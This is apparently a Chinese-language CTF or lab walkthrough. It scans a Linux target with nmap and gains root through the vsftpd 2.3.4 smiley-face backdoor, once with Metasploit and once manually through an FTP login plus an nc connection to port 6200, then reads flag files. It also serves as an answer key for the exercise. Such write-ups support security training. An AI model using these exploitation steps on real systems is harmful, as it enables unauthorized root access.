1.通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;
使用命令nmap -n -T4 -O 172.16.1.8对服务器场景Linux进行操作系统扫描渗透测试,来获得操作系统版本信息
Flag:Linux 2.6.32 - 3.10
2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;
使用命令nmap -sV 172.16.1.8来扫描系统服务及版本号
扫描结果中并未识别出Mysql的服务版本信息
Flag:Mysql(unauthorized)
3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;
再次使用命令nmap -sV 172.16.1.8对运行的服务版本号进行扫描,发现了其中运行了ftp服务,并且版本号为2.3.4这个版本存在vsftpd笑脸漏洞,我们通过两种方法对其进行利用
方法一
使用命令msfconsole打开metasploit渗透测试平台
使用命令search vsftpd_234搜索漏洞利用模块
然后使用命令use exploit/unix/ftp/vsftpd_234_backdoor调用该模块,再然后使用命令show options查看模块的需要配置的参数
使用命令set RHOST 172.16.1.8,最后使用命令exploit进行利用
利用成功,根据题目要求需要获取网站耿根目录下的网页文件的内容,使用命令cat /var/www/html,然后使用cat命令查看该文件
Flag:zpertgvd
4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;
使用命令ls /root查看root目录下的文件
使用命令cd /root切换路径,使用ls命令进行查看Flag:asuorwed.bmp
5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。
将根目录下的文件复制到/var/www/html中,然后在渗透机浏览器中打开
然后在nc客户端使用命令chmod 777 asuorwed.bmp对该文件进行赋权使得所有用户能够查看
再然后使用命令firefox打开火狐浏览器,输入地址http://172.16.1.8/asuorwed.bmp
Flag:sunny
对其进行利用的方法二:
使用命令ftp 172.16.1.8转到ftp认证交互界面
然后在输入用户名的时候,在后面加上:)一个笑脸符号,再任意输入一个密码
使用命令nc 172.16.1.8 6200,再启动一个命令终端,然后使用命令id查看当前用户的权限为root
连接成功同样能够获得root管理员权限